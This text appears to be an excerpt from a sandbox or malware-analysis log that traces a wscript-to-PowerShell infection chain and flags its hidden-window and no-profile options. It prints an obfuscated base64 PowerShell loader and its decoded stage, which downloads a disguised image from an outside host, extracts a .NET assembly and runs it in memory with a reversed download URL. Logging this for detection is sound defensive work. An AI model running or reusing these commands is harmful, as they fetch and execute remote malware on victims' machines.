bypss -NoProfile -command $OWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂Gc⁂aQBu⁂GE⁂b⁂⁂v⁂HU⁂bgBp⁂HY⁂ZQBy⁂HM⁂bwBf⁂HY⁂YgBz⁂C4⁂agBw⁂GU⁂Zw⁂n⁂Ds⁂J⁂B3⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂g⁂D0⁂I⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBO⁂GU⁂d⁂⁂u⁂Fc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂LgBE⁂G8⁂dwBu⁂Gw⁂bwBh⁂GQ⁂R⁂Bh⁂HQ⁂YQ⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FU⁂cgBs⁂Ck⁂Ow⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBU⁂GU⁂e⁂B0⁂C4⁂RQBu⁂GM⁂bwBk⁂Gk⁂bgBn⁂F0⁂Og⁂6⁂FU⁂V⁂BG⁂Dg⁂LgBH⁂GU⁂d⁂BT⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂FM⁂V⁂BB⁂FI⁂V⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂ZQBu⁂GQ⁂RgBs⁂GE⁂Zw⁂g⁂D0⁂I⁂⁂n⁂Dw⁂P⁂BC⁂EE⁂UwBF⁂DY⁂N⁂Bf⁂EU⁂TgBE⁂D4⁂Pg⁂n⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂p⁂Ds⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂Ek⁂bgBk⁂GU⁂e⁂BP⁂GY⁂K⁂⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwBl⁂C⁂⁂M⁂⁂g⁂C0⁂YQBu⁂GQ⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂ZwB0⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂Kw⁂9⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂RgBs⁂GE⁂Zw⁂u⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂g⁂D0⁂I⁂⁂k⁂GU⁂bgBk⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂C0⁂I⁂⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂Ow⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂FM⁂dQBi⁂HM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Cw⁂I⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂Ew⁂ZQBu⁂Gc⁂d⁂Bo⁂Ck⁂Ow⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBD⁂G8⁂bgB2⁂GU⁂cgB0⁂F0⁂Og⁂6⁂EY⁂cgBv⁂G0⁂QgBh⁂HM⁂ZQ⁂2⁂DQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂GI⁂YQBz⁂GU⁂Ng⁂0⁂EM⁂bwBt⁂G0⁂YQBu⁂GQ⁂KQ⁂7⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C⁂⁂PQ⁂g⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBS⁂GU⁂ZgBs⁂GU⁂YwB0⁂Gk⁂bwBu⁂C4⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂F0⁂Og⁂6⁂Ew⁂bwBh⁂GQ⁂K⁂⁂k⁂GM⁂bwBt⁂G0⁂YQBu⁂GQ⁂QgB5⁂HQ⁂ZQBz⁂Ck⁂Ow⁂k⁂HQ⁂eQBw⁂GU⁂I⁂⁂9⁂C⁂⁂J⁂Bs⁂G8⁂YQBk⁂GU⁂Z⁂BB⁂HM⁂cwBl⁂G0⁂YgBs⁂Hk⁂LgBH⁂GU⁂d⁂BU⁂Hk⁂c⁂Bl⁂Cg⁂JwBG⁂Gk⁂YgBl⁂HI⁂LgBI⁂G8⁂bQBl⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂I⁂⁂9⁂C⁂⁂J⁂B0⁂Hk⁂c⁂Bl⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂FY⁂QQBJ⁂Cc⁂KQ⁂7⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂I⁂⁂9⁂C⁂⁂L⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBm⁂GM⁂dg⁂x⁂C8⁂Qg⁂v⁂Ho⁂bg⁂u⁂Gc⁂bgBp⁂GQ⁂b⁂Bp⁂HU⁂YgBk⁂HI⁂YQB5⁂G4⁂aQB3⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://cdn.pixelbin.io/v2/red-wildflower-1b0af4/original/universo_vbs.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.fcv1/B/zn.gnidliubdrayniw//:sptth');$method.Invoke($null, $arguments)"
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe